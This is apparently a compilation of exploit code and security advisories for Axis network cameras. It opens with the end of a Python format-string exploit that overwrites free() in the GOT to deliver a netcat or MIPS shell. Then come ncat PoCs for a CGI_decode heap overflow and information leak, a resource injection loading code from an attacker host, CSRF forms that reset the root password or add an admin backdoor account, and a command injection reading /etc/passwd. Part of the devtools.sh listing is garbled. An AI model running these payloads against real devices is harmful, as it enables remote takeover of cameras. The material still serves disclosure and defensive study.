	# than the FMS has counted up to, by using Two-Write-Where-and-What with two writes to free() GOT
	# address with two LSB writes.
	#
	elif NCSH2:
		#
		# Direct parameter access for FMS exploitation are really nice and easy to use.
		# However, we need to exploit in two stages with two requests.
		# (I was trying to avoid this "Two-Stages" so much as possibly in this exploit developement...)
		#
		# 1. Write "Two-Write-Where", where 2nd is two bytes higher than 1st (this allows us to write to MSB and LSB)
		# 2. Write with "Two-Write-What", where 1st (LSB) and 2nd (MSB) "Write-Where" pointing to.
		# 
		# With "new style", we can write with POPs independently as we don't depended of same criteria as in "NCSH1",
		# we can use any regular "Stack-to-Stack" pointer as we can freely choose the POP-and-Write.
		# [Note the POP1/POP2 (low-high) vs POP3/POP4 (high-low) difference.]
		#
		# Stack Example:
		#
		# Stack content	|	Stack address (ASLR)
		#
		# 0x7e818dd0	|	@0x7e818dc4>>>>>+ 1st "Write-Where" [@Stage One]
		# 0x76f41fb8	|	@0x7e818dc8     |
		# 0x76f3d70c	|	@0x7e818dcc     |
		# 0x76f55ab8	|	@0x7e818dd0<<<<<+ 1st "Write-What" [@Stage Two]
		# 0x1		|	@0x7e818dd4
		# [....]
		# 0x1c154	|	@0x7e818e10
		# 0x7e818e20	|	@0x7e818e14>>>>>+ 2nd "Write-Where" [@Stage One]
		# 0x76f41fb8	|	@0x7e818e18     |
		# 0x76f3d70c	|	@0x7e818e1c     |
		# 0x76f55758	|	@0x7e818e20<<<<<+ 2nd "Write-What" [@Stage Two]
		# 0x1		|	@0x7e818e24
		#

		FMScode.Add(shell)

		#
		# 1st and 2nd "Write-Where" already done in stage one
		#
		# 1st and 2nd "Write-What"
		#
		FMScode.AddADDR(GOTint + FirstWhat)	# Run up to 0x0002XXXX, write with LSB (0xXXXX) to LSB in target address.
		FMScode.AddDirectParameterN(POP3)	# Write with 4 bytes (we want to zero out in MSB)
		FMScode.AddADDR(SecondWhat + 3)		# Run up to 0x00020300, write with LSB (0xZZ) to lower part of MSB. (0x00ZZXXXX)
		FMScode.AddDirectParameterHHN(POP4)	# Write with one byte 0x000203[00] or 0x000203[01] depending from above calculation

	elif NCSH1:
		# Could use direct argument addressing here, but I like to keep "old style" as well,
		# as it's another interesting concept.
		#
		# Two matching stack contents -> stack address in row w/o or max two POP's between,
		# is needed to write two bytes higher (MSB).
		# 
		#
		# Stack Example:
		#
		# Stack Content	|	@Stack Address (ASLR)
		#
		# 0x9c		|	@7ef2fde8 -> [POP1's]
		# [....]
		# 0x1		|	@7ef2fdec -> [GOTint address]
		#------
		# 0x7ef2fe84	|	@7ef2fdf0 >>>>>+     Write 'FirstWhere' (%n) [LSB]
		#                       -> 'XX'        |     two bytes (Can be one or two POP's as well, by using %2c or %1c%1c as POPer)
		# 0x7ef2fe8c	|	@7ef2fdf4 >>>>>>>>>+ Write 'SecondWhere' (%n) [MSB]
		# ------                               |   |
		# [....]                -> [POP3's]    |   |
		# 0x7fb99dc	|	@7ef2fe7c      |   |
		# 0x7ef2fe84	|	@7ef2fe80      |   | [Count up to 0x2XXXX]
		# 0x7ef2ff6a	|	@7ef2fe84 <<<<<+   | Write 'XXXX' 'FirstWhat' (%n) (0x0002XXXX))
		#                       -> [POP4's]        |
		# (nil)		|	@7ef2fe88          | [Count up to 0x20300]
		# 0x7ef2ff74	|	@7ef2fe8c <<<<<<<<<+ Write 'ZZ' 'SecondWhat' (%hhn) (0x00ZZXXXX)

		FMScode.Add(shell)

		# Write FirstWhere for 'FirstWhat'
		FMScode.AddPOP(POP1)
		FMScode.AddADDR(GOTint) # Run up to free() GOT address
		FMScode.AddWRITEn(1)

		# Write SecondWhere for 'SecondWhat'
		#
		# This is special POP with 1 byte, we can maximum POP 2!
		#
		# This POP sequence is actually no longer used in this part of exploit, was developed to meet the requirement
		# for exploitation of 5.2.x and 5.40.x, as there needed to be one POP with maximum of two bytes.
		# Kept as reference as we now using direct parameter access AKA 'New Style" for 5.2x/5.4x
		#
		if POP2 != 0:
			# We only want to write 'SecondWhat' two bytes higher at free() GOT
			if POP2 > 2:
				print "POP2 can't be greater than two!"
				sys.exit(1)
			if POP2 == 1:
				FMScode.Add("%2c")
			else:
				FMScode.Add("%1c%1c")
		else:
			FMScode.Add("XX")
		FMScode.AddWRITEn(1)

		# Write FirstWhat pointed by FirstWhere
		FMScode.AddPOP(POP3)		# Old Style POP's
		FMScode.AddADDR(FirstWhat)	# Run up to 0x0002XXXX, write with LSB (0xXXXX) to LSB in target address.
		FMScode.AddWRITEn(1)		# Write with 4 bytes (we want to zero out in MSB)
		
		# Write SecondWhat pointed by SecondWhere
		FMScode.AddPOP(POP4)		# Old Style POP's
		FMScode.AddADDR(SecondWhat)	# Run up to 0x00020300, write with LSB (0xZZ) to lower part of MSB. (0x00ZZXXXX)
		FMScode.AddWRITEhhn(1)		# Write with one byte 0x000203[00] or 0x000203[01] depending from above calculation

	# Unreachable (see the mode selection above); exits without a message
	else:
		sys.exit(1)

	FMSdata = FMScode.FMSbuild()

	print "[>] StG_2: Writing shellcode address to free() GOT address:",'0x{:08x}'.format(GOThex),"(%d bytes)" % (len(FMSdata))

	# FMS comes here, and calculations start after '=' in the url
	# target_url2 is whichever .shtml path stage one settled on (the fallback if the first gave 404)
	try:
		if NCSH1 or NCSH2:
			html = HTTPconnect(rhost,proto,verbose,creds,noexploit).RAW(target_url2 + FMSdata) # Netcat shell
		else:
			html = HTTPconnect(rhost,proto,verbose,creds,noexploit).Send(target_url2 + FMSdata) # MIPS/CRIS shellcode
	except urllib2.HTTPError as e:
		print "[!] Payload delivery failed:",str(e)
		sys.exit(1)
	except Exception as e:
		# 1st string returned by HTTP mode, 2nd by HTTPS mode
		# NOTE: success is inferred purely from a read timeout; no response content is verified
		if str(e) == "timed out" or str(e) == "('The read operation timed out',)":
			print "[i] Timeout! Payload delivered sucessfully!"
		else:
			print "[!] Payload delivery failed:",str(e)
			sys.exit(1)

	if noexploit:
		print "\n[*] Not exploiting, no shell...\n"
	else:
		print "\n[*] All done, enjoy the shell...\n"

#
# [EOF]
#
            
[STX]

Subject: Axis Communications MPQT/PACS Heap Overflow and Information Leakage.

Attack vector: Remote
Authentication: Anonymous (no credentials needed)
Researcher: bashis <mcw noemail eu> (August 2017)
PoC: https://github.com/mcw0/PoC
Release date: December 1, 2017
Full Disclosure: 90 days (due to the large volume of affected devices)

heap: Non-Executable + ASLR
stack: Non-Executable + ASLR

Axis Vulnerability ID: ACV-120444

Vulnerable: MPQT series < v7.20.x/6.50.1.2
Not vulnerable: MPQT series > v7.30/6.50.1.3 (Releases from September to November 2017)

Vulnerable: PACS series < v1.30.0.2/1.60.0/1.10.0.2/1.65.1
Not vulnerable (Releases from October to November 2017):

1. Information leak; All MPQT and PACS (Exist actually from v4.x Firmware)
2. Heap Overflow; MPQT and PACS with Apache Web Server (cannot be triggered with Boa Web Server)

[Note]
The best way to find a fixed FW is to check the Axis advisory and look for 'ACV-120444' in the release notes.
https://www.axis.com/global/en/support/firmware
https://www.axis.com/global/en/support/product-security


Timeline:
August 31, 2017: Initiated contact with Axis
September 1, 2017: Response from Axis
September 5, 2017: ACK of findings from Axis
September 9, 2017: Received first test image from Axis to verify fix
September 28, 2017: Received first advisory draft from Axis
November 15-27, 2017: Coordination with Axis for Full Disclosure
December 1, 2017: Full Disclosure

-[General Information]-
"CGI_decode" in /usr/lib/libcgiparser.so suffers from a bug in its handling of URL decoding of '%xx' sequences.
CGI_decode does not check the size of what it is about to decode; it always assumes "%" plus two characters.

By supplying only one single '%', 'CGI_decode' will try to URL decode [% + NULL + Next char], which leads to the return of a longer string than expected, as the new string will be read until the next NULL. ([NULL string termination + Next char] are replaced with one '?')

-[Information leakage]-

The "%" in "GET /index.shtml?size=%" triggers both the "information disclosure" and the "heap overflow", depending on how it is used.

[PoC] (see the breakpoint with the 'AAAA' in the 'Result')
$ echo -en "GET /index.shtml?size=AAAA% HTTP/1.0\n\n" | ncat -v 192.168.57.20 80

[Result]
...
      var completePath = "imagepath=" + encodeURIComponent(imagepath) + "&size=AAAA?http_user=anonymous&http_remote_addr=192.168.57.1&http_remote_port=44019&http_port=80&http_scheme_addr=http://http&http_protocol=http&www_authenticate_header=WWW-Authenticate:%20Digest%20realm=%22_%22,%20nonce=%22pP/WaqNeBQA=884e58ea2563f69a14215a33ca02efa68eeca126%22,%20algorithm=MD5,%20qop=%22auth%22";
...


-[Heap Overflow]-

To trigger the heap overflow we need to send ~20KB of data, which would normally not be accepted by the Web server.
The way around this is to use 'Referer:' and 'x-sessioncookie', where we can send a maximum of 8162 bytes in each of them.

[Note]
Without the information leakage bug above, the realloc() will never be triggered regardless of how much data is sent.

[PoC]
$ echo -en "GET /index.shtml?size=% HTTP/1.0\nReferer: `for((i=0;i<8162;i++));do echo -en "\x22";done`\nx-sessioncookie: `for((i=0;i<2157;i++));do echo -en "\x22";done`\n\n" | ncat -v 192.168.57.20 80

[Result]
/var/log/info.log
2017-05-08T08:22:23.801+00:00 axis [ INFO    ] ssid[3337]: *** Error in `/bin/ssid': realloc(): invalid next size: 0x00bfda50 ***

-[Vulnerable binaries]-

/bin/ssid (Server Side Include Daemon)
/bin/urldecode (URL Command Line Tool)
/usr/bin/dynamic_overlayd (Dynamic Overlay Daemon)
/usr/bin/wsd (Web Service Dispatch Daemon)
/usr/html/axis-cgi/param.cgi (VAPIX Parameter Management)

/usr/lib/libwsevent.so
/usr/lib/libcgiparser.so (<= with the vulnerable function 'CGI_decode()', used in above binaries)

Have a nice day
/bashis

[ETX]
            
          0RWELLL4BS
          **********
       security advisory
         olsa-2015-8258
         PGP: 79A6CCC0
          @orwelllabs




Advisory Information
====================
- Title: ImagePath Resource Injection/Open script editor
- Vendor: AXIS Communications
- Research and Advisory: Orwelllabs
- Class: Improper Input Validation [CWE-20]
- CVE Name: CVE-2015-8258
- Affected Versions: Firmware versions < 5.80.x
- IoT Attack Surface: Device Administrative Interface/Authentication/Authorization
- OWASP IoTTop10: I1, I2



Technical Details
=================
The variable "imagePath=" (which is prone to XSS in a large range of
products) can also be used for resource injection. If a URL is inserted
in this variable, a GET request will be made to that URL, so this is an
interesting point from which to request malicious code from the attacker's
machine, and of course the possibilities are vast (including hooking the browser).


An attacker sends the following URL for the current Web user interface of
the camera:
http://{AXISVULNHOST}/view.shtml?imagepath=http://www.3vilh0st.com/evilcode.html

This request will be processed normally and will return the status code 200
(OK):

[REQUEST]

GET /view.shtml?imagepath=http://www.3vilh0st.com/evilcode.html HTTP/1.1
Host: {axisvulnhost}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:41.0) Gecko/20100101
Firefox/41.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Authorization: Digest username="Winst0n", realm="AXIS_XXXXXXXXXXX",
nonce="00978cY6s4g@Sadd1b11a9A6ed955e1b5ce9eb",
uri="/view.shtml?imagepath=http://www.3vilh0st.com/evilcode.html",
response="5xxxxxxxxxxxxxxxxxxxxxx", qop=auth,
nc=0000002b, cnonce="00rw3ll4bs0rw3lll4bs"
Connection: keep-alive


GET /evilcode.html HTTP/1.1
Host: www.3vilh0st.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:41.0) Gecko/20100101
Firefox/41.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://{axisvulnhost}/view.shtml?imagepath=http://www.3vilh0
st.com/evilcode.html
Connection: keep-alive

The server response can be seen below (with the clipping of the affected
HTML code snippets - just look for "http://www.3vilh0st.com/evilcode.html"):


<table border="0" cellpadding="3" cellspacing="3">
 <tr>
  <td id="videoStreamTable">
   <script language="JavaScript">
    <!--
     video('http://www.3vilh0st.com/evilcode.html');
    // -->
   </script>
  </td>
 </tr>
</table>

[..SNIP..]

function listVideoSources()
{
var formInt = document.listFormInt;
var formExt = document.listFormExt;
var formCrop = document.listFormCrop;
var presetForm = document.listFormPreset;
var form = document.WizardForm
var currentPath = 'http://www.3vilh0st.com/evilcode.html';
var imageSource;

[..SNIP..]

var reload = false;
reload |= (other != null && other.search("seq=yes") >= 0);
reload |= (other != null && other.search("streamprofile=") >= 0);
reload |= ((other == null || (other != null && other.search("streamprofile=
;)(r") == -1)) && ('' != ""));
reload |= (imagePath != 'http://www.3vilh0st.com/evilcode.html');

[..SNIP..]

<script SRC="/incl/activeX.js?id=69"></script>
</head>
<body class="bodyBg" topmargin="0" leftmargin="15" marginwidth="0"
marginheight="0" onLoad="DrawTB('no', 'http://www.3vilh0st.com/evilcode.html',
'1', '0', 'no', 'no', 'true', getStreamProfileNbr());" onResize="">
<script language="JavaScript">

[..SNIP..]

// Draw the scale buttons
var currentResolution = 0
var width = 0
var height = 0
var imagepath = "http://www.3vilh0st.com/evilcode.html"
var resStart = imagepath.indexOf("resolution=")
if (resStart != -1) {
var resStop = imagepath.indexOf("&", resStart)

[..SNIP..]


=================== view.shtml snips =====================

 447 function zoom(size)
 448 {
 449   var url = document.URL;
 450
 451   if (url.indexOf("?") == -1) {
 452     url += "F?size=" + size
 453   } else if (url.indexOf("size=") == -1) {
 454     url += "&size=" + size
 455   } else {
 456     var searchStr = "size=<!--#echo var="size"
option="encoding:javascript" -->"
 457     var replaceStr = "size=" + size
 458     var re = new RegExp(searchStr , "g")
 459     url = url.replace(re, replaceStr)
 460   }
 461
 462   document.location = url;
 463 }
 464
 465 var aNewImagePath;
 466
 467 function reloadPage()
 468 {
 469   document.location = aNewImagePath;
 470 }
 471

[ SNIP ]

 567     aNewImagePath = '/view/view.shtml?id=<!--#echo
var="ssi_request_id" option="encoding:url" -->&imagePath=' +
escape(imagePath) + size;
 568     if (other != null)
 569       aNewImagePath += other;
 570 <!--#if expr="$ptzpresets = yes" -->
 571     /* append preset parameters so that preset postion is selected in
drop down list after reload */
 572     if (presetName != '')
 573       aNewImagePath += "&gotopresetname=" + escape(presetName);
 574     else if (gotopresetname != '')
 575       aNewImagePath += "&gotopresetname=" + escape(gotopresetname);
 576
 577     if( newCamera != '')
 578       aNewImagePath += "&camera=" + escape(newCamera);



---*---
Some legitimate features can be very interesting to cybercriminals deploying
ransomware/botnets/bitcoin miners/backdoors/malware etc. In this case one
such feature is the "Open Script Editor". Through it the user can edit any
file in the operating system with root privileges, because (on most IoT
devices) everything runs with root privileges; this is another dangerous
point to keep in mind.

> Open Script Editor path: 'System Options' -> 'Advanced' -> 'Scripting'

One could argue that this feature is restricted to the administrator of the
camera, and that would be a real restriction only if customers were forced
to change the default password during the setup phase under a strong
password policy, since changing "pass" to "pass123" does not solve the
problem. The aggravating factor is that there are thousands of these
products reachable on the internet, running with default credentials.


Vendor Information, Solutions and Workarounds
+++++++++++++++++++++++++++++++++++++++++++++
According to the manufacturer, the resource injection vulnerability was
fixed in firmware 5.60, but we identified that the problem still occurred
in 5.80.x versions of various product models. Check for updates on the
manufacturer's website.

Regarding the Open Script Editor, it was argued that access to this feature
requires being authenticated as an admin; but if there is no policy that
forces the customer to change the password during product setup (ease vs.
security) and also requires password complexity, needing an administrative
credential to abuse the functionality is not much of an impediment (e.g.
botnets that ship with a built-in list of default credentials for that type
of device).


Credits
=======
These vulnerabilities have been discovered and published by Orwelllabs.


Legal Notices
=============
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise. We accept no
responsibility for any damage caused by the use or misuse of this
information.


About Orwelllabs
================
https://www.exploit-db.com/author/?a=8225
https://packetstormsecurity.com/files/author/12322/
            
          0RWELLL4BS
          **********
       security advisory
         olsa-CVE-2015-8255
         PGP: 79A6CCC0
          @orwelllabs




Advisory Information
====================
- Title: Cross-Site Request Forgery
- Vendor: AXIS Communications
- Research and Advisory: Orwelllabs
- Class: Session Management control [CWE-352]
- CVE Name: CVE-2015-8255
- Affected Versions:
- IoT Attack Surface: Device Web Interface
- OWASP IoTTop10: I1



Technical Details
=================
Because of the (bad) design inherent to this kind of device (actually one
of the big problems of IoT), the embedded web application does not verify
whether a valid request was intentionally submitted by the user.



PoCs
====
#-> Setting root password to W!nst0n

<html>
  <!-- CSRF PoC  Orwelllabs -->
  <!-- Review note: this form submits a root password change to pwdgrp.cgi
       carrying nothing but the request parameters; no per-request secret is
       required, so a page the victim merely visits can submit it with the
       victim's own credentials (the missing "was this request intended"
       check described in the Technical Details above).
       Mitigation: a per-session anti-CSRF token validated server-side on
       every state-changing request, state changes accepted only over POST,
       and SameSite on any session cookie the device sets. -->
  <body>
    <form action="http://xxx.xxx.xxx.xxx/axis-cgi/admin/pwdgrp.cgi">
      <input type="hidden" name="action" value="update" />
      <input type="hidden" name="user" value="root" />
      <input type="hidden" name="pwd" value="w!nst0n" />
      <input type="hidden" name="comment" value="Administrator" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


#-> Adding new credential SmithW:W!nst0n

<html>
  <!-- CSRF PoC - Orwelllabs -->
  <!-- Review note: same missing anti-CSRF check as the password-change form
       above, here used to add an account; the sgrp value enrols it in every
       group (viewer, operator, admin, ptz), so a successful submission is a
       full administrative backdoor account. A defender auditing a device
       should review the user list for unexpected entries in the admin group.
       Mitigation is the same: server-validated per-session token on
       pwdgrp.cgi and state changes accepted only over POST. -->
  <body>
    <form action="http://xxx.xxx.xxx.xxx/axis-cgi/admin/pwdgrp.cgi">
      <input type="hidden" name="action" value="add" />
      <input type="hidden" name="user" value="SmithW" />
      <input type="hidden" name="sgrp"
value="viewer&#58;operator&#58;admin&#58;ptz" />
      <input type="hidden" name="pwd" value="W!nst0n" />
      <input type="hidden" name="grp" value="users" />
      <input type="hidden" name="comment" value="WebUser" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


#-> Deleting an app via direct CSRF (axis_update.shtml)

http://xxx.xxx.xxx.xxx/axis-cgi/vaconfig.cgi?action=get&name=<script src="
http://xxx.xxx.xxx.xxx/axis-cgi/admin/local_del.cgi?+/usr/html/local/viewer/axis_update.shtml
"></script>


[And many actions available to a user (all of them?) can be forged in this
way]


Vendor Information, Solutions and Workarounds
+++++++++++++++++++++++++++++++++++++++++++++
Well, this is a very old design problem of this kind of device, nothing new
to say about that.


Credits
=======
These vulnerabilities have been discovered and published by Orwelllabs.


Legal Notices
=============
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise. We accept no
responsibility for any damage caused by the use or misuse of this
information.


About Orwelllabs
================
https://www.exploit-db.com/author/?a=8225
https://packetstormsecurity.com/files/author/12322/
            
  _   _   _   _   _   _   _   _   _   _
 / \ / \ / \ / \ / \ / \ / \ / \ / \ / \
( 0 | R | W | 3 | L | L | L | 4 | 8 | 5 )
 \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/

        www.orwelllabs.com
        security advisory
         olsa-2015-8257
         PGP: 79A6CCC0


* Advisory Information
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
(+) Title: AXIS Multiple Products Authenticated Remote Command Execution via devtools vector
(+) Vendor: AXIS Communications
(+) Research and Advisory: Orwelllabs
(+) Advisory URL: http://www.orwelllabs.com/2016/01/axis-commucations-multiple-products.html
(+) Class: Improper Input Validation [CWE-20]
(+) CVE Name: CVE-2015-8257
(+) Remotely Exploitable: Yes
(+) Locally Exploitable: No
(+) OLSA-ID: OWLL2015-8257
(+) Affected Versions: Multiple Products/Firmwares (check the list bellow)
(+) IoT Attack Surface: Device Administrative Interface/Authentication/Authorization
(+) Owasp IoTTop10: I1, I2
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


Vulnerability
+++++++++++++
AXIS Network Cameras (various models/firmwares) are prone to an authenticated
remote command execution vulnerability. By exploiting it, a remote attacker can
force the execution of unauthorized actions, which may lead to further attacks.

Technical Details
+++++++++++++++++
The devtools.sh script is responsible for the vulnerability, and its 4 attack vectors are reached through the following pages:


http://xxx.xxx.xxx.xxx/app_license.shtml?app=
http://xxx.xxx.xxx.xxx/app_license_custom.shtml?app=
http://xxx.xxx.xxx.xxx/app_index.shtml?app=
http://xxx.xxx.xxx.xxx/app_params.shtml?app=


An attacker can use the app parameter, which expects the name of a
legitimate application, to inject operating-system commands using "%3B"
(an encoded semicolon) — for example, to read the contents of /etc/passwd:

http: //
xxx.xxx.xxx.xxx/app_license.shtml?app=ORWELLLABS%3Bcat%20/etc/passwd

The data entered in the "app=" parameter is passed without any sanitization
to the devtools.sh script located at {HTMLROOT}/bin/devtools.sh

This script contains several functions, namely:

list()
status()
menulist()
mainpagelink()
SETTINGSLINK()
confvariable()
echo_ssivar_licensekey()
load_auto_inst_form()

When these functions are invoked, they operate on the parameters passed by
the web application through the affected pages (e.g. app_license.shtml?app=).
When the code below is injected:

http: //
xxx.xxx.xxx.xxx/app_license.shtml?app=ORWELLLABS%3Bcat%20/etc/passwd

the value passed in "app" is handed directly to devtools.sh, which is
invoked via sh -c, as shown in the process listing below (third line,
invoking the confvariable function):

[SNIP]
 2039    led      25472 S    /usr/bin/enldgts -n
12014   root         0 SW   [kworker/0:0]
13178   root      2548 S    /bin/sh -c /usr/html/bin/devtools.sh
confvariable ORW..
13183   root      2728 R    ps -aux PACKAGENAME
13312   root         0 SW   [kworker/3:1]
13320   root         0 SW   [kworker/2:0]
[SNIP]

The value "ORWELLLABS%3Bcat%20/etc/passwd" is then passed on to the
corresponding function (after going through a check in "confvariable()").

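# confvariable NAME VAR
#
# Print the value of shell variable VAR as set by the package config file
# "$PACKAGE_DIRECTORY/NAME/$ADPPACKCFG"; print nothing when that file is not
# readable. PACKAGE_DIRECTORY and ADPPACKCFG come from the caller's
# environment (not visible here).
#
# Review note: NAME is the "app" request parameter, which the advisory shows
# reaching this script unsanitized through "sh -c". That shell string build
# is the injection vector and lives in the caller, outside this function; the
# checks below only bound what a hostile NAME or VAR can do once this
# function itself is entered (path traversal via NAME, code via the eval on
# VAR). Returns 1 on rejected input, 0 otherwise.
confvariable() {
	local val=
	local name="$1"
	local var="$2"
	# NAME is used as a single path component: reject empty, traversal and
	# multi-component values before touching the filesystem.
	case "$name" in
		''|*/*|.|..) return 1 ;;
	esac
	# VAR is spliced into an eval: allow only a plain shell identifier.
	case "$var" in
		''|*[!A-Za-z0-9_]*|[0-9]*) return 1 ;;
	esac
	if [ -r "$PACKAGE_DIRECTORY/$name/$ADPPACKCFG" ]; then
		. "$PACKAGE_DIRECTORY/$name/$ADPPACKCFG" || :
		# Indirect expansion; safe because VAR was validated above.
		eval "val=\${$var}"
		# Quoted so the value is printed verbatim, not re-split or globbed.
		echo "$val"
	fi
}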


It then enters the function "menulist()", whose main section is located
between lines 127 and 143:

[SNIP]
127 [ "$ name", "/app_params.shtml", "app = $ APPNAME &" hostA, <! - # If
expr = "\ $ activeMenu1 = $ APPNAME" -> true <! - # Else - -> false <! - #
endif ->, null,
128 [
129 [ "Settings", "/app_params.shtml", "app = $ APPNAME &" hostA, <! - # If
expr = "\ $ ActivePage = param_ $ APPNAME" -> true <! - # Else - -> false
<! - # endif ->, null, []],
130 EOF
131 if [-z "$ LICENSEPAGE"] || [ "$ LICENSEPAGE" axis =]; Then
132 cat << - EOF
133 [ "License", "/app_license.shtml", "app = $ APPNAME &" hostA, <! - # If
expr = "\ $ ActivePage = license_ $ APPNAME" -> true <! - # Else - -> false
<! - # endif ->, null, []],
134 EOF
135 fi
136 if [ "$ LICENSEPAGE" = custom] && [-r "$ HTMLROOT / local / $ APPNAME /
license.inc"]; Then
137 cat << - EOF
138 [ "License", "/app_license_custom.shtml", "app = $ APPNAME &" hostA, <!
- # If expr = "\ $ ActivePage custom_ = $ APP NAME" -> true <! - # Else ->
false <! - # endif ->, null, []],
139 EOF
140 fi
141 if [-r "$ HTMLROOT / local / $ APPNAME / about.inc"]; Then
142 cat << - EOF
143 [ "About", "/app_index.shtml", "app = $ APPNAME &" hostA, <! - # If
expr = "\ $ ActivePage = $ APPNAME" -> true <! - # Else - > false <! - #
endif ->, null, []],


Where the important lines are the menus below:


/bin/devtools.sh (127):
[ "$ Name", "/app_params.shtml", "app = $ APPNAME &" hostA, <! - # If expr
= "\ $ activeMenu1 = $ APPNAME" -> true -> false <! - #endif ->, null,
/bin/devtools.sh (129):
[ "Settings", "/app_params.shtml", "app = $ APPNAME &" hostA, <! - # If
expr = "\ $ ActivePage = param_ -> true <! - # Else -> false < ! - # endif
->, null, []],
/bin/devtools.sh (133):
[ "License", "/app_license.shtml", "app = $ APPNAME &" hostA, <! - # If
expr = "\ $ ActivePage = License" -> true <! - # Else -> false <! - # endif
->, null, []],
/bin/devtools.sh (138):
[ "License", "/app_license_custom.shtml", "app = $ APPNAME &" hostA, <! - #
If expr = "\ $ ActivePage = APPNAME" -> true <! - # Else -> false <! - #
endif ->, null, []],
/bin/devtools.sh (143):
[ "About", "/app_index.shtml", "app = $ APPNAME &" hostA, <! - # If expr =
"\ $ ActivePage = $ APPNAME" - # else -> false <! - # endif ->, null, []],


In the PoC presented above, the payload is triggered by the vector on line
133 of the devtools script (the "License" menu), which becomes:


[ "License", "/app_license.shtml", "app = ORWELLLABS% 3Bcat% 20
/etc/passwd& "HostA, <! - # If expr =" \ $ ActivePage = License "-> true <!
- # Else -> false <! - # Endif ->, null, []],

and, when executed, echoes the results onto the page.


Impact
++++++
Taking into account the busybox environment behind it (which runs with root
privileges everywhere, in all binaries and scripts), the impact of this
vulnerability is that it is possible to execute arbitrary commands, create
backdoors, open a reverse connection to the attacker's machine, and enlist
these devices in botnets and DDoS amplification... the limit is the
attacker's creativity.


Affected Products
+++++++++++++++++
Multiple Axis Communications Products/Firmware including:

          * AXIS Q6032-E/Q6034-E/Q6035-E PTZ Dome Network Camera  -
Firmware 5.41.1.4
          * AXIS Q6042-E/Q6044-E/Q6045-E PTZ Dome Network Camera  -
Firmware 5.70.1.2
          * AXIS A8004-VE Network Video Door Station              -
Firmware 5.85.1.1
          * AXIS P3384 fixed dome Network camera                  -
Firmware 6.10.1
          * AXIS P5532-E PTZ Dome Network Camera                  -
Firmware 5.41.3.1
          * AXIS Q60-E Network Dome PTZ                           -
Firmware 5.65.1.1, 5.41.*, 5.70.1.1
          * AXIS Q7401 Video Encoder                              -
Firmware 5.50.4
          * AXIS Q7404 Video Encoder                              -
Firmware 5.50.4.*
          * AXIS Q7406 Blade Video Encoder                        -
Firmware 5.51.2
          * AXIS Q7411 Video Encoder                              -
Firmware 5.90.1
          * AXIS Q7414 Blade Video Encoder                        -
Firmware 5.51.2
          * AXIS Q7424-R Video Encoder                            -
Firmware 5.50.4
          * AXIS Q7424-R Mk II Video Encoder                      -
Firmware 5.51.3
          * AXIS Q7436 Blade Video Encoder                        -
Firmware 5.90.1


The list below shows the affected firmwares (these firmware versions are
probably no longer available, only the latest version of each; if you are
not sure, check the hash). All these firmwares (second column) embed the
same "devtools.sh" shell script (responsible for triggering the RCE
vulnerability). The script can be found at:
"{HTMLROOT}/bin/devtools.sh".

========================================================================
PRODUCT            FIRMWARE        FIRMWARE HASH
========================================================================
AXIS A8004-VE        5.85.1.1      e666578d7fca54a7db0917839187cd1a
AXIS A8004-VE        5.85.1        50f114d1169f6fe8dbdadd89ad2e087d
AXIS F34             5.85.3        7a6ed55038edd8a2fc0f676fb8a04b10
AXIS F41             5.85.3        8a089a51a0ecd63543c7883c76db7921
AXIS F44             5.85.3        9e3b05625cfe6580ca3e41c5415090e7
AXIS M1013           5.50.5.4      231cdd7ba84a383ba7f2237612b1cc12
AXIS M1014           5.50.5.4      231cdd7ba84a383ba7f2237612b1cc12
AXIS M1025           5.50.5.4      90d59c56171402828fceb7d25b18be2e
AXIS M1033-W         5.50.5.4      7b96dd594f84fc8c3a4a3ab650434841
AXIS M1034-W         5.50.5.4      7b96dd594f84fc8c3a4a3ab650434841
AXIS M1054           5.50.3.4      39e279aa2c462e9ec01c7b90f698f76a
AXIS M1103           5.50.3        c10243b05fe30655ded7a12b998dbf5e
AXIS M1104           5.50.3        c10243b05fe30655ded7a12b998dbf5e
AXIS M1113           5.50.3        c10243b05fe30655ded7a12b998dbf5e
AXIS M1114           5.50.3        c10243b05fe30655ded7a12b998dbf5e
AXIS M1124           5.75.3.3      f53e0ada9f2e54d2717bf8ad1c7a5928
AXIS M1125           5.75.3.3      f53e0ada9f2e54d2717bf8ad1c7a5928
AXIS M1143-L         5.60.1.5      367aab0673fc1dec0b972fd80a62e75b
AXIS M1144-L         5.60.1.5      367aab0673fc1dec0b972fd80a62e75b
AXIS M1145           5.90.1        ece8f4ccd9d24a01d382798cb7e4a7c7
AXIS M1145-L         5.90.1        ece8f4ccd9d24a01d382798cb7e4a7c7
AXIS M2014           5.50.6        3ffe1a771565b61567f917621c737866
AXIS M3004           5.50.5.4      d65545ef6c03b33b20bf1a04e8216a65
AXIS M3005           5.50.5.4      b461fb6e6aab990d3650b48708cee811
AXIS M3006           5.70.1.2      b2864dcf48ac83053ba4516a2bda535e
AXIS M3007           5.75.1.1      a0cc2e9a6ddad758b16f7de518080f70
AXIS M3014           5.40.9.5      01d8917c9e60dde7741c4a317044b2f7
AXIS M3024-LVE       5.50.5.4      0b91bb66d37e208e130c7eb25099817b
AXIS M3025-VE        5.50.5.4      751f776668d340edf4149dc116ce26c6
AXIS M3026           5.70.1.2      3e78ce4badf994f6d10c5916b6d5513d
AXIS M3027           5.75.1.1      6d377ea9ea99068e910b416ccc73d8ca
AXIS M3037           5.75.1.1      ef69c662079018e19e988663ad1fc509
AXIS M3113-R         5.40.9.4      8d3eac43ad5c23626b75d5d7c928e29d
AXIS M3113-VE        5.40.9.4      8d3eac43ad5c23626b75d5d7c928e29d
